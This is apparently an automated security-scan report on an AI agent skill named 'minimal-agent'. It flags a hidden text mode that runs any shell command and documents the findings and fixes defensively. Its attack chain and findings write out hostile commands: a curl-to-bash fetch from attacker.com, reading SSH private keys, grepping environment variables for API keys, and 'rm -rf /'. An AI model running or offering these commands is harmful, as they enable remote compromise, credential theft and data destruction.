High Risk — Risk Score 75/100
Last scan: 1 day ago
minimal-agent
Minimal AI OS control agent (claimed); actually provides unrestricted command execution
Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.
Skill Name: minimal-agent
Duration: 50.4s
Engine: pi
Do not install this skill
DO NOT USE. The skill documents controlled hardware automation but actually enables unrestricted shell execution, arbitrary file operations, and network access with no guardrails. If a restricted OS control agent is needed, implement with explicit tool allowlisting and remove text/V1 mode entirely.

Attack Chain 7 steps

1. Escalation: Skill marketed as a minimal OS control agent with window management and hardware control (SKILL.md:1)
2. Escalation: V1/text mode documented as a 'development/debugging' feature without emphasizing unrestricted command execution (SKILL.md:65)
3. Escalation: Attacker forces V1 mode via the --text flag or config mode='force_text' (scripts/agent.py:444)
4. Escalation: execute_raw_command() passes arbitrary input to a shell=True subprocess (scripts/agent.py:459)
5. Impact: Attacker executes 'curl https://attacker.com/shell.sh | bash' for a reverse shell (scripts/agent.py:459)
6. Impact: Attacker executes 'cat ~/.ssh/id_rsa' to steal SSH keys (scripts/agent.py:459)
7. Impact: Attacker executes 'env | grep API' to harvest credentials (scripts/agent.py:459)

Findings 6 items

[Critical] Unrestricted Arbitrary Command Execution via V1 Mode (RCE)
Location: scripts/agent.py:459
The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.
Evidence: subprocess.run(command_str, shell=True, capture_output=True, text=True, timeout=30)
→ Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.
[Critical] Documentation Mismatch: Claims Minimal Control But Enables Full System Access (Doc Mismatch)
Location: SKILL.md:67
SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.
Evidence (SKILL.md): In **V1 (text) mode**, Minimal Agent can execute **any system command**
→ Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.
[High] Direct Shell Injection via User Input (RCE)
Location: scripts/agent.py:459
The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.
Evidence: result = subprocess.run(command_str, shell=True, ...)
→ Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.
[High] Undeclared Elevated Permissions (Priv Escalation)
Location: SKILL.md:87
The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.
Evidence (SKILL.md): System management: user management, service control, registry editing
→ Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.
[Medium] Python venv Path Hardcoded with User Home Directory (Obfuscation)
Location: scripts/agent.py:114
Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe', which could be leveraged for persistence or DLL hijacking attacks.
Evidence: PYTHON_VENV = r"C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe"
→ Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.
[Medium] Potential Environment Variable Access for API Keys (Credential Theft)
Location: scripts/agent.py:459
V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.
Evidence: shell=True enables access to os.environ
→ If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.
Resource Permissions

Resource      Declared  Inferred    Status       Evidence
Shell         WRITE     WRITE       ✓ Aligned    agent.py:run_script() uses subprocess
Filesystem    WRITE     WRITE       ✓ Aligned    agent.py + V1 mode enables any file operation
Network       READ      READ_WRITE  ✗ Violation
Database      NONE      WRITE       ✗ Violation
Environment   NONE      READ        ✗ Violation
Skill Invoke  NONE      WRITE       ✗ Violation
External URLs 3 findings

Medium  External URL  https://skillhub.tencent.com/skills/system-controller  (SKILL.md:262)
Medium  External URL  https://clawhub.ai/wangjiaocheng/system-controller  (SKILL.md:271)
Medium  External URL  https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip  (SKILL.md:275)

File Tree

3 files · 49.5 KB · 1255 lines
Python: 1 file, 938 lines · Markdown: 1 file, 293 lines · TOML: 1 file, 24 lines
├─ 📁 scripts
│ ├─ 🐍 agent.py Python 938L · 35.9 KB
│ └─ 📄 config.toml TOML 24L · 1.1 KB
└─ 📝 SKILL.md Markdown 293L · 12.5 KB

Dependencies 2 items

Package     Version  Source  Known Vulns  Notes
subprocess  stdlib   Python  No           Standard library only
tomllib     stdlib   Python  No           Standard library only

Security Positives

✓ V2/function-calling mode provides controlled execution with 55 predefined tools
✓ Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
✓ Configuration allows disabling auto mode fallback to V1
✓ Timeout limits (30s) prevent indefinite command execution